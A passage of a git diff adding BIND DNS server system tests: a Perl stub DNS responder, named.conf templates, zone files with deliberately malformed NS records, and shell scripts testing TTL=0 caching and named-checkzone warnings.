"cannot open pid file: $!"; +print $pidf "$$\n" or die "cannot write pid file: $!"; +$pidf->close or die "cannot close pid file: $!"; +sub rmpid { unlink "ans.pid"; exit 1; }; + +$SIG{INT} = \&rmpid; +$SIG{TERM} = \&rmpid; + +my $octet = 0; + +for (;;) { + $sock->recv($buf, 512); + + print "**** request from " , $sock->peerhost, " port ", $sock->peerport, "\n"; + + my $packet; + + if ($Net::DNS::VERSION > 0.68) { + $packet = new Net::DNS::Packet(\$buf, 0); + $@ and die $@; + } else { + my $err; + ($packet, $err) = new Net::DNS::Packet(\$buf, 0); + $err and die $err; + } + + print "REQUEST:\n"; + $packet->print; + + $packet->header->qr(1); + + my @questions = $packet->question; + my $qname = $questions[0]->qname; + my $qtype = $questions[0]->qtype; + + $packet->header->aa(1); + if ($qtype eq "A") { + $packet->push("answer", + new Net::DNS::RR($qname . + " 0 A 192.0.2." . $octet)); + $octet = $octet + 1; + } elsif ($qtype eq "AAAA") { + $packet->push("answer", + new Net::DNS::RR($qname . + " 300 AAAA 2001:db8:beef::1")); + } + + $sock->send($packet->data); + print "RESPONSE:\n"; + $packet->print; + print "\n"; +} diff --git a/bin/tests/system/zero/clean.sh b/bin/tests/system/zero/clean.sh new file mode 100644 index 0000000..2ef5727 --- /dev/null +++ b/bin/tests/system/zero/clean.sh @@ -0,0 +1,22 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f */named.conf +rm -f */named.run +rm -f */named.memstats +rm -f ns2/example.db +rm -f ns4/example.bk +rm -f dig.out* +rm -f query.list +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/zero/ns1/named.conf.in b/bin/tests/system/zero/ns1/named.conf.in new file mode 100644 index 0000000..1334c85 --- /dev/null +++ b/bin/tests/system/zero/ns1/named.conf.in @@ -0,0 +1,29 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; +}; + +zone "." { + type primary; + file "root.db"; +}; diff --git a/bin/tests/system/zero/ns1/root.db b/bin/tests/system/zero/ns1/root.db new file mode 100644 index 0000000..fbcb3e2 --- /dev/null +++ b/bin/tests/system/zero/ns1/root.db @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ SOA ns1. hostmaster.warn.example. ( + 1 3600 1200 604800 3600 ) + NS ns1. +ns1. A 10.53.0.1 +; +example. NS ns2.example. +ns2.example. A 10.53.0.2 +example. NS ns4.example. +ns4.example. A 10.53.0.4 +increment. NS incrementns. +incrementns. A 10.53.0.5 +tld. NS ns2.tld. +ns2.tld. A 10.53.0.2 + diff --git a/bin/tests/system/zero/ns2/named.args b/bin/tests/system/zero/ns2/named.args new file mode 100644 index 0000000..b20594e --- /dev/null +++ b/bin/tests/system/zero/ns2/named.args @@ -0,0 +1 @@ +-m record,size,mctx -c named.conf -d 1 -D zero-ns2 -X named.lock -g -T maxcachesize=2097152 diff --git a/bin/tests/system/zero/ns2/named.conf.in b/bin/tests/system/zero/ns2/named.conf.in new file mode 100644 index 0000000..751eafd --- /dev/null +++ b/bin/tests/system/zero/ns2/named.conf.in @@ -0,0 +1,34 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; +}; + +zone "example" { + type primary; + file "example.db"; +}; + +zone "tld" { + type primary; + file "tld.db"; +}; diff --git a/bin/tests/system/zero/ns2/tld.db b/bin/tests/system/zero/ns2/tld.db new file mode 100644 index 0000000..0ffeb05 --- /dev/null +++ b/bin/tests/system/zero/ns2/tld.db @@ -0,0 +1,20 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 1 +@ 300 SOA ns2.tld. hostmaster.ns2.tld. 0 1 1 1 1 +@ 300 NS ns2.tld. +ns2 300 A 10.53.0.2 +; +; The TTL of these delegation records needs to 1. +; +one 1 NS ns4.one.tld. +ns4.one 1 A 10.53.0.4 diff --git a/bin/tests/system/zero/ns3/named.args b/bin/tests/system/zero/ns3/named.args new file mode 100644 index 0000000..9d89bd6 --- /dev/null +++ b/bin/tests/system/zero/ns3/named.args @@ -0,0 +1 @@ +-m record,size,mctx -c named.conf -d 1 -D zero-ns3 -X named.lock -g -T maxcachesize=2097152 diff --git a/bin/tests/system/zero/ns3/named.conf.in b/bin/tests/system/zero/ns3/named.conf.in new file mode 100644 index 0000000..3492b9f --- /dev/null +++ b/bin/tests/system/zero/ns3/named.conf.in @@ -0,0 +1,29 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; +}; + +zone "." { + type hint; + file "root.hint"; +}; diff --git a/bin/tests/system/zero/ns3/root.hint b/bin/tests/system/zero/ns3/root.hint new file mode 100644 index 0000000..206e952 --- /dev/null +++ b/bin/tests/system/zero/ns3/root.hint @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +. NS ns1. +ns1. A 10.53.0.1 diff --git a/bin/tests/system/zero/ns4/named.args b/bin/tests/system/zero/ns4/named.args new file mode 100644 index 0000000..09d1fe0 --- /dev/null +++ b/bin/tests/system/zero/ns4/named.args @@ -0,0 +1 @@ +-m record,size,mctx -c named.conf -d 1 -D zero-ns4 -X named.lock -g -T maxcachesize=2097152 diff --git a/bin/tests/system/zero/ns4/named.conf.in b/bin/tests/system/zero/ns4/named.conf.in new file mode 100644 index 0000000..fc8fec6 --- /dev/null +++ b/bin/tests/system/zero/ns4/named.conf.in @@ -0,0 +1,35 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation yes; +}; + +zone "example" { + type secondary; + primaries { 10.53.0.2; }; + file "example.bk"; +}; + +zone "one.tld" { + type primary; + file "one.tld.db"; +}; diff --git a/bin/tests/system/zero/ns4/one.tld.db b/bin/tests/system/zero/ns4/one.tld.db new file mode 100644 index 0000000..491ba87 --- /dev/null +++ b/bin/tests/system/zero/ns4/one.tld.db @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 1 +; The TTL of all these records needs to be 1. +@ 1 SOA ns4.one.tld. hostmaster.ns4.tld. 0 1 1 1 1 +@ 1 NS ns4.one.tld. +ns4 1 A 10.53.0.4 +www 1 A 10.53.0.4 diff --git a/bin/tests/system/zero/prereq.sh b/bin/tests/system/zero/prereq.sh new file mode 100644 index 0000000..ec369f8 --- /dev/null +++ b/bin/tests/system/zero/prereq.sh @@ -0,0 +1,23 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +if $PERL -e 'use Net::DNS;' 2>/dev/null +then + : +else + echo_i "This test requires the Net::DNS library." >&2 + exit 1 +fi diff --git a/bin/tests/system/zero/setup.sh b/bin/tests/system/zero/setup.sh new file mode 100644 index 0000000..592034c --- /dev/null +++ b/bin/tests/system/zero/setup.sh @@ -0,0 +1,22 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf +copy_setports ns4/named.conf.in ns4/named.conf + +$SHELL ../genzone.sh 2 4 | sed -e 's/^$TTL 3600$/$TTL 0 ; force TTL to zero/' -e 's/86400.IN SOA/0 SOA/' > ns2/example.db diff --git a/bin/tests/system/zero/tests.sh b/bin/tests/system/zero/tests.sh new file mode 100644 index 0000000..0449552 --- /dev/null +++ b/bin/tests/system/zero/tests.sh @@ -0,0 +1,122 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +#shellcheck source=conf.sh +SYSTEMTESTTOP=.. +. "$SYSTEMTESTTOP/conf.sh" + +dig_with_opts() { + "$DIG" -p "${PORT}" "$@" +} + +wait_for_pid() ( + for pid in "$@"; do + kill -0 "$pid" 2>/dev/null && return 1 + done + return 0 +) + +status=0 +n=0 + +n=$((n+1)) +echo_i "check lookups against TTL=0 records ($n)" +i=0 +ret=0 +passes=10 +dig_with_opts @10.53.0.2 axfr example | grep -v "^ds0" | \ +awk '$2 == "0" { print "-q", $1, $4; print "-q", "zzz"$1, $4;}' > query.list + +# add 1/5 second per query +timeout=$(($(wc -l < query.list) / 5)) +while [ $i -lt $passes ] +do + (dig_with_opts @10.53.0.3 -f query.list > "dig.out$i.1.test$n") & pid1="$!" + (dig_with_opts @10.53.0.3 -f query.list > "dig.out$i.2.test$n") & pid2="$!" + (dig_with_opts @10.53.0.3 -f query.list > "dig.out$i.3.test$n") & pid3="$!" + (dig_with_opts @10.53.0.3 -f query.list > "dig.out$i.4.test$n") & pid4="$!" + (dig_with_opts @10.53.0.3 -f query.list > "dig.out$i.5.test$n") & pid5="$!" + (dig_with_opts @10.53.0.3 -f query.list > "dig.out$i.6.test$n") & pid6="$!" + + retry_quiet "$timeout" wait_for_pid "$pid1" "$pid2" "$pid3" "$pid4" "$pid5" "$pid6" || ret=1 + kill -TERM "$pid1" "$pid2" "$pid3" "$pid4" "$pid5" "$pid6" 2>/dev/null + + wait "$pid1" || ret=1 + wait "$pid2" || ret=1 + wait "$pid3" || ret=1 + wait "$pid4" || ret=1 + wait "$pid5" || ret=1 + wait "$pid6" || ret=1 + + grep "status: SERVFAIL" "dig.out$i.1.test$n" > /dev/null && ret=1 + grep "status: SERVFAIL" "dig.out$i.2.test$n" > /dev/null && ret=1 + grep "status: SERVFAIL" "dig.out$i.3.test$n" > /dev/null && ret=1 + grep "status: SERVFAIL" "dig.out$i.4.test$n" > /dev/null && ret=1 + grep "status: SERVFAIL" "dig.out$i.5.test$n" > /dev/null && ret=1 + grep "status: SERVFAIL" "dig.out$i.6.test$n" > /dev/null && ret=1 + [ $ret = 1 ] && break + i=$((i+1)) + echo_i "successfully completed pass $i of $passes" +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +repeat_query() ( + i=0 + while [ "$i" -lt "$1" ]; do + dig_with_opts +short "@$2" "$3" | tee "dig.out$i.test$n" || return 1 + i=$((i+1)) + done +) + +count_unique() ( + repeat_query "$@" | sort -u | wc -l +) + +n=$((n+1)) +echo_i "check repeated recursive lookups of non recurring TTL=0 responses get new values ($n)" +ret=0 +repeats=9 +count=$(count_unique "$repeats" 10.53.0.3 foo.increment) +if [ "$count" -ne "$repeats" ] ; then echo_i "failed (count=$count, repeats=$repeats)"; ret=1; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check lookups against TTL=1 records ($n)" +i=0 +passes=10 +ret=0 +while [ $i -lt $passes ] +do + dig_with_opts @10.53.0.3 www.one.tld > "dig.out$i.1.test$n" || ret=1 + dig_with_opts @10.53.0.3 www.one.tld > "dig.out$i.2.test$n" || ret=1 + dig_with_opts @10.53.0.3 www.one.tld > "dig.out$i.3.test$n" || ret=1 + dig_with_opts @10.53.0.3 www.one.tld > "dig.out$i.4.test$n" || ret=1 + dig_with_opts @10.53.0.3 www.one.tld > "dig.out$i.5.test$n" || ret=1 + dig_with_opts @10.53.0.3 www.one.tld > "dig.out$i.6.test$n" || ret=1 + grep "status: SERVFAIL" "dig.out$i.1.test$n" > /dev/null && ret=1 + grep "status: SERVFAIL" "dig.out$i.2.test$n" > /dev/null && ret=1 + grep "status: SERVFAIL" "dig.out$i.3.test$n" > /dev/null && ret=1 + grep "status: SERVFAIL" "dig.out$i.4.test$n" > /dev/null && ret=1 + grep "status: SERVFAIL" "dig.out$i.5.test$n" > /dev/null && ret=1 + grep "status: SERVFAIL" "dig.out$i.6.test$n" > /dev/null && ret=1 + [ $ret = 1 ] && break + i=$((i+1)) + echo_i "successfully completed pass $i of $passes" + sleep 1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "exit status: $status" +[ "$status" -eq 0 ] || exit 1 diff --git a/bin/tests/system/zonechecks/a.db b/bin/tests/system/zonechecks/a.db new file mode 100644 index 0000000..62d1ee7 --- /dev/null +++ b/bin/tests/system/zonechecks/a.db @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 3600 IN SOA ns hostmaster 1 3600 1200 604800 3600 +@ 3600 IN NS 127.0.0.1 +127.0.0.1 3600 IN A 127.0.0.1 diff --git a/bin/tests/system/zonechecks/aaaa.db b/bin/tests/system/zonechecks/aaaa.db new file mode 100644 index 0000000..75724d6 --- /dev/null +++ b/bin/tests/system/zonechecks/aaaa.db @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 3600 IN SOA ns hostmaster 1 3600 1200 604800 3600 +@ 3600 IN NS ::1 +::1 3600 IN AAAA ::1 diff --git a/bin/tests/system/zonechecks/bigserial.db b/bin/tests/system/zonechecks/bigserial.db new file mode 100644 index 0000000..200573a --- /dev/null +++ b/bin/tests/system/zonechecks/bigserial.db @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 3600 IN SOA ns hostmaster 3003113544 3600 1200 604800 3600 +@ 3600 IN NS ns +ns 3600 IN A 10.53.0.1 diff --git a/bin/tests/system/zonechecks/clean.sh b/bin/tests/system/zonechecks/clean.sh new file mode 100644 index 0000000..ed4012a --- /dev/null +++ b/bin/tests/system/zonechecks/clean.sh @@ -0,0 +1,22 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f *.out +rm -f */named.memstats +rm -f */named.conf +rm -f */named.run +rm -f */*.db */*.db.signed */K*.key */K*.private */*.jnl */dsset-* +rm -f */signer.err +rm -f rndc.out.* +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* ns*/*.mkeys* diff --git a/bin/tests/system/zonechecks/cname.db b/bin/tests/system/zonechecks/cname.db new file mode 100644 index 0000000..2e8a123 --- /dev/null +++ b/bin/tests/system/zonechecks/cname.db @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 3600 IN SOA ns hostmaster 1 3600 1200 604800 3600 +@ 3600 IN NS ns +ns 3600 IN CNAME @ diff --git a/bin/tests/system/zonechecks/dname.db b/bin/tests/system/zonechecks/dname.db new file mode 100644 index 0000000..b2859d1 --- /dev/null +++ b/bin/tests/system/zonechecks/dname.db @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 3600 IN SOA ns hostmaster 1 3600 1200 604800 3600 +@ 3600 IN NS ns +@ 3600 IN DNAME . diff --git a/bin/tests/system/zonechecks/noaddress.db b/bin/tests/system/zonechecks/noaddress.db new file mode 100644 index 0000000..f656197 --- /dev/null +++ b/bin/tests/system/zonechecks/noaddress.db @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 3600 IN SOA ns hostmaster 1 3600 1200 604800 3600 +@ 3600 IN NS ns +ns 3600 IN TXT this name has no address records diff --git a/bin/tests/system/zonechecks/ns1/named.conf.in b/bin/tests/system/zonechecks/ns1/named.conf.in new file mode 100644 index 0000000..78f087d --- /dev/null +++ b/bin/tests/system/zonechecks/ns1/named.conf.in @@ -0,0 +1,72 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS1 + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + dnssec-validation yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +view unused { + match-clients { none; }; + + zone "duplicate.example" { + type primary; + file "duplicate.db"; + }; +}; + +view primary { + match-clients { any; }; + + zone "primary.example" { + type primary; + file "primary.db"; + allow-update { any; }; + allow-transfer { any; }; + auto-dnssec maintain; + }; + + zone "bigserial.example" { + type primary; + file "bigserial.db"; + }; + + zone "reload.example" { + type primary; + file "reload.db"; + }; + + zone "duplicate.example" { + type primary; + file "duplicate.db"; + }; +}; diff --git a/bin/tests/system/zonechecks/ns2/named.conf.in b/bin/tests/system/zonechecks/ns2/named.conf.in new file mode 100644 index 0000000..79e7c18 --- /dev/null +++ b/bin/tests/system/zonechecks/ns2/named.conf.in @@ -0,0 +1,42 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + dnssec-validation yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "primary.example" { + type secondary; + primaries { 10.53.0.1; }; + file "sec.db"; +}; diff --git a/bin/tests/system/zonechecks/nxdomain.db b/bin/tests/system/zonechecks/nxdomain.db new file mode 100644 index 0000000..853325d --- /dev/null +++ b/bin/tests/system/zonechecks/nxdomain.db @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 3600 IN SOA ns hostmaster 1 3600 1200 604800 3600 +@ 3600 IN NS ns +; There are no records at all with the ownername of "ns". diff --git a/bin/tests/system/zonechecks/setup.sh b/bin/tests/system/zonechecks/setup.sh new file mode 100644 index 0000000..a6cbb6f --- /dev/null +++ b/bin/tests/system/zonechecks/setup.sh @@ -0,0 +1,34 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +$SHELL clean.sh + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf + +$SHELL ../genzone.sh 1 > ns1/primary.db +$SHELL ../genzone.sh 1 > ns1/duplicate.db +cp bigserial.db ns1/ +cd ns1 +touch primary.db.signed +echo '$INCLUDE "primary.db.signed"' >> primary.db +$KEYGEN -a ${DEFAULT_ALGORITHM} -q primary.example > /dev/null 2>&1 +$KEYGEN -a ${DEFAULT_ALGORITHM} -qfk primary.example > /dev/null 2>&1 +$SIGNER -SD -o primary.example primary.db > /dev/null \ + 2> signer.err || cat signer.err +echo '$INCLUDE "soa.db"' > reload.db +echo '@ 0 NS .' >> reload.db +echo '@ 0 SOA . . 1 0 0 0 0' > soa.db diff --git a/bin/tests/system/zonechecks/tests.sh b/bin/tests/system/zonechecks/tests.sh new file mode 100644 index 0000000..e2a6879 --- /dev/null +++ b/bin/tests/system/zonechecks/tests.sh @@ -0,0 +1,257 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="-p ${PORT}" +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +status=0 + +# +echo_i "checking that we detect a NS which refers to a CNAME" +if $CHECKZONE . cname.db > cname.out 2>&1 +then + echo_i "failed (status)"; status=`expr $status + 1` +else + if grep "is a CNAME" cname.out > /dev/null + then + : + else + echo_i "failed (message)"; status=`expr $status + 1` + fi +fi + +# +echo_i "checking that we detect a NS which is below a DNAME" +if $CHECKZONE . dname.db > dname.out 2>&1 +then + echo_i "failed (status)"; status=`expr $status + 1` +else + if grep "is below a DNAME" dname.out > /dev/null + then + : + else + echo_i "failed (message)"; status=`expr $status + 1` + fi +fi + +# +echo_i "checking that we detect a NS which has no address records (A/AAAA)" +if $CHECKZONE . noaddress.db > noaddress.out +then + echo_i "failed (status)"; status=`expr $status + 1` +else + if grep "has no address records" noaddress.out > /dev/null + then + : + else + echo_i "failed (message)"; status=`expr $status + 1` + fi +fi + +# +echo_i "checking that we detect a NS which has no records" +if $CHECKZONE . nxdomain.db > nxdomain.out +then + echo_i "failed (status)"; status=`expr $status + 1` +else + if grep "has no address records" noaddress.out > /dev/null + then + : + else + echo_i "failed (message)"; status=`expr $status + 1` + fi +fi + +# +echo_i "checking that we detect a NS which looks like a A record (fail)" +if $CHECKZONE -n fail . a.db > a.out 2>&1 +then + echo_i "failed (status)"; status=`expr $status + 1` +else + if grep "appears to be an address" a.out > /dev/null + then + : + else + echo_i "failed (message)"; status=`expr $status + 1` + fi +fi + +# +echo_i "checking that we detect a NS which looks like a A record (warn=default)" +if $CHECKZONE . a.db > a.out 2>&1 +then + if grep "appears to be an address" a.out > /dev/null + then + : + else + echo_i "failed (message)"; status=`expr $status + 1` + fi +else + echo_i "failed (status)"; status=`expr $status + 1` +fi + +# +echo_i "checking that we detect a NS which looks like a A record (ignore)" +if $CHECKZONE -n ignore . a.db > a.out 2>&1 +then + if grep "appears to be an address" a.out > /dev/null + then + echo_i "failed (message)"; status=`expr $status + 1` + else + : + fi +else + echo_i "failed (status)"; status=`expr $status + 1` +fi + +# +echo_i "checking that we detect a NS which looks like a AAAA record (fail)" +if $CHECKZONE -n fail . aaaa.db > aaaa.out 2>&1 +then + echo_i "failed (status)"; status=`expr $status + 1` +else + if grep "appears to be an address" aaaa.out > /dev/null + then + : + else + echo_i "failed (message)"; status=`expr $status + 1` + fi +fi + +# +echo_i "checking that we detect a NS which looks like a AAAA record (warn=default)" +if $CHECKZONE . aaaa.db > aaaa.out 2>&1 +then + if grep "appears to be an address" aaaa.out > /dev/null + then + : + else + echo_i "failed (message)"; status=`expr $status + 1` + fi +else + echo_i "failed (status)"; status=`expr $status + 1` +fi + +# +echo_i "checking that we detect a NS which looks like a AAAA record (ignore)" +if $CHECKZONE -n ignore . aaaa.db > aaaa.out 2>&1 +then + if grep "appears to be an address" aaaa.out > /dev/null + then + echo_i "failed (message)"; status=`expr $status + 1` + else + : + fi +else + echo_i "failed (status)"; 